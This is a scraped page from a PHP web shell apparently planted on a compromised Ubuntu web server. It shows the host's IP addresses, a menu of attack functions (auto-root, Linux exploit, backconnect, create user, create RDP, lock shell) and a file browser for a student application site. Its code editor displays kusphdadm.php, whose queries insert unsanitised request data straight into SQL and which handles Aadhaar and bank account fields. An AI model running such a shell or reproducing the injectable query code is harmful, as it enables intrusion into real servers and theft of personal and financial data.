Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.156.153
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
PrathibhaKaranji_stop /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
applicationFormReportPOSTOFFIC...
19.27
KB
-rwxr-xr-x
applicationFormReportSBM.php
8.41
KB
-rwxr-xr-x
caccesscontext.php
1.24
KB
-rwxr-xr-x
cappcontext.php
2.66
KB
-rwxr-xr-x
code39.php
6.38
KB
-rwxr-xr-x
coutput.php
1.76
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
514
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.35
KB
-rwxr-xr-x
dropdown.php
844
B
-rwxr-xr-x
format.php
7.43
KB
-rwxr-xr-x
fpdf_protection.php
5.61
KB
-rwxr-xr-x
getdata.php
1.06
KB
-rwxr-xr-x
getnumword.php
7.15
KB
-rwxr-xr-x
instruction.html
9.62
KB
-rwxr-xr-x
json.php
33.2
KB
-rwxr-xr-x
kusphdadm.php
6.5
KB
-rwxr-xr-x
mregistry.php
4.97
KB
-rwxr-xr-x
re_rigistration.php
7.38
KB
-rwxr-xr-x
report_bulk_applications.php
6.06
KB
-rwxr-xr-x
report_hall_ticket.php
11.31
KB
-rwxr-xr-x
reportapplicationform - Copy.p...
19.59
KB
-rwxr-xr-x
reportapplicationform.php
23.92
KB
-rwxr-xr-x
rotation.php
596
B
-rwxr-xr-x
saveApplication.php
8.91
KB
-rwxr-xr-x
saveRerigistration.php
10.87
KB
-rwxr-xr-x
student.php
11.75
KB
-rwxr-xr-x
student_24092018.php
13.3
KB
-rwxr-xr-x
subfeedetl.php
3.39
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kusphdadm.php
<?php function saveApplication($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $reg_no = $aobj_context->mobj_data["reg_no"]; include_once($aobj_context->main_src."/json.php"); $json = new Services_JSON(); //recieve decode json string of personal info $lstr_param = stripslashes($aobj_context->mobj_data["personal_info"]); $per_arr_data = json_decode($lstr_param, true); // $fappno = stripslashes($aobj_context->mobj_data["fappno"]); $fappno = stripslashes($aobj_context->mobj_data["fappno"]); $schadd = stripslashes($aobj_context->mobj_data["schadd"]); $eventp = stripslashes($aobj_context->mobj_data["eventp"]); $fmode = stripslashes($aobj_context->mobj_data["fmode"]); ////recieve decode json string of subject info $rgPerArray = array(); for($i=0; $i<count($per_arr_data); $i++) { $rgPerArray[$per_arr_data[$i]['id']] = $per_arr_data[$i]['value']; } if($_SESSION['MOBILE'] == '') { $arr['message'] = '1. Please login and try again'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } $fappno = ''; $query = "select fmobileno, fappno,fname from student where fmobileno = '{$rgPerArray['stuMobileno']}'"; $studresult = $aobj_context->mobj_db->GetRow($query); if(count($studresult) >0) $fappno = $studresult['fappno']; if($fmode == 'I' && $fappno != '') { $arr['message'] = 'Mobile No. Alreday Entered by in the name of '.$studresult['fname']; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } if($fappno == '') { $insert_qry="insert into student (FMOBILENO ,FAADHAR, FNAME , FFATNAME , FMOTNAME , FDOB, FGENDER , FPERADD1 , FPERADD2, FPERADD3 ,FPERDIST ,FPERPIN , FPERSTATE , FSECADD1 , FSECADD2 , FSECADD3 , FSECDIST ,FSECPIN , FSECSTATE , FACCOUNT , FIFSC , FBANK ,FBRANCH,FTEACH , FTEACHMOB , FTEACHSEC, FTEACHSECADD, FEVENT , FEVENTL , FEVENTWD, FEVENTP,FENTEREDBY,FENTEREDDIST,FENTEREDMOB,FENTEREDDATE) values ('{$rgPerArray['stuMobileno']}','{$rgPerArray['stuaadhrno']}', '{$rgPerArray['idStudname']}','{$rgPerArray['idFatname']}', '{$rgPerArray['idMotname']}',date_format(STR_TO_DATE('{$rgPerArray['idDob']}','%d/%m/%Y'),'%Y-%m-%d'), '{$rgPerArray['gender']}', '{$rgPerArray['padd1']}','{$rgPerArray['padd2']}', '{$rgPerArray['padd3']}','{$rgPerArray['pdistrict']}', '{$rgPerArray['ppincode']}','{$rgPerArray['pstate']}','{$rgPerArray['cadd1']}', '{$rgPerArray['cadd2']}','{$rgPerArray['cadd3']}','{$rgPerArray['distic']}', '{$rgPerArray['cpincode']}','{$rgPerArray['cstate']}', '{$rgPerArray['idaccno']}', '{$rgPerArray['idiifsc']}','{$rgPerArray['idbank']}', '{$rgPerArray['idbranch']}','{$rgPerArray['idteachnmae']}', '{$rgPerArray['idteachno']}','{$rgPerArray['idschname']}','{$schadd}', '{$rgPerArray['event']}', '{$rgPerArray['eventl']}', date_format(STR_TO_DATE('{$rgPerArray['eventw']}','%d/%m/%Y'),'%Y-%m-%d'), '{$eventp}','{$_SESSION['NAME']}','{$_SESSION['DISTCPDE']}','{$_SESSION['MOBILE']}',now())"; $results = $aobj_context->mobj_db->Execute($insert_qry); if($results) { $query = "select student.fappno from student where fmobileno = '{$rgPerArray['stuMobileno']}'"; $results2 = $aobj_context->mobj_db->GetRow($query); if(count($results2) > 0) { $fappno = $results2['fappno']; } else { $arr['message'] = '2. Error in saving details.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } } } else { $query = "update student set FAADHAR = '{$rgPerArray['stuaadhrno']}', FNAME = '{$rgPerArray['idStudname']}', FFATNAME = '{$rgPerArray['idFatname']}', FMOTNAME = '{$rgPerArray['idMotname']}', FDOB = date_format(STR_TO_DATE('{$rgPerArray['idDob']}','%d/%m/%Y'),'%Y-%m-%d'), FGENDER = '{$rgPerArray['gender']}', FPERADD1 = '{$rgPerArray['padd1']}', FPERADD2 = '{$rgPerArray['padd2']}', FPERADD3 = '{$rgPerArray['padd3']}', FPERDIST = '{$rgPerArray['pdistrict']}', FPERPIN = '{$rgPerArray['ppincode']}', FPERSTATE = '{$rgPerArray['pstate']}', FSECADD1 = '{$rgPerArray['cadd1']}', FSECADD2 = '{$rgPerArray['cadd2']}', FSECADD3 = '{$rgPerArray['cadd3']}', FSECDIST = '{$rgPerArray['distic']}', FSECPIN = '{$rgPerArray['cpincode']}', FSECSTATE = '{$rgPerArray['cstate']}', FACCOUNT = '{$rgPerArray['idaccno']}', FIFSC = '{$rgPerArray['idiifsc']}', FBANK = '{$rgPerArray['idbank']}', FBRANCH = '{$rgPerArray['idbranch']}', FTEACH = '{$rgPerArray['idteachnmae']}', FTEACHMOB = '{$rgPerArray['idteachno']}', FTEACHSEC = '{$rgPerArray['idschname']}', FTEACHSECADD = '{$schadd}', FEVENT = '{$rgPerArray['event']}', FEVENTL = '{$rgPerArray['eventl']}', FEVENTWD = date_format(STR_TO_DATE('{$rgPerArray['eventw']}','%d/%m/%Y'),'%Y-%m-%d'), FEVENTP = '{$eventp}', FENTEREDBY = '{$_SESSION['NAME']}', FENTEREDDIST = '{$_SESSION['DISTCPDE']}', FENTEREDMOB = '{$_SESSION['MOBILE']}',FENTEREDDATE = NOW() where fappno = '{$fappno}'"; $results = $aobj_context->mobj_db->Execute($query); } if($results) { $folder_path=$aobj_context->main_src."/student_photos"; $photo_filename = $rgPerArray['photo_path']; if($photo_filename != '') { $image_path = $aobj_context->main_src."/upload/{$photo_filename}"; $filename = explode(".", $photo_filename); $ext = strtolower($filename[1]); $photo_filename = $fappno; $photo_filename = $photo_filename.".".$ext; $full_file_path = $folder_path.'/'.$photo_filename; $photo = "student_photos/".$photo_filename; if(copy($image_path,$full_file_path)) { $update="update student set FPHOTOPATH='{$photo}' where FAPPNO= '{$fappno}'"; $up_obj=$aobj_context->mobj_db->Execute($update); unlink($image_path); } } $data='Your Application is submitted successfully.'; $arr['message']= $data; $arr['app_no'] = $fappno; $arr['slno'] = $slnocnt; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } else { $arr['message'] = 'Error in submitting the application.'; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"failure"); return; } } function rePrintApplication($aobj_context) { session_start(); $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $query = "select ifnull(fappno,'') as fappno from studadm where FCONTACT_NO = '{$_SESSION['MOBILE']}' and ffinsub = 'T'"; $obj = $aobj_context->mobj_db->GetRow($query); // var_dump($obj); $row['appno'] = $obj['fappno']; $row['error_code'] = '0'; if($obj['fappno'] == '') { $row['error_code'] = '1'; } echo json_encode($row); }
Close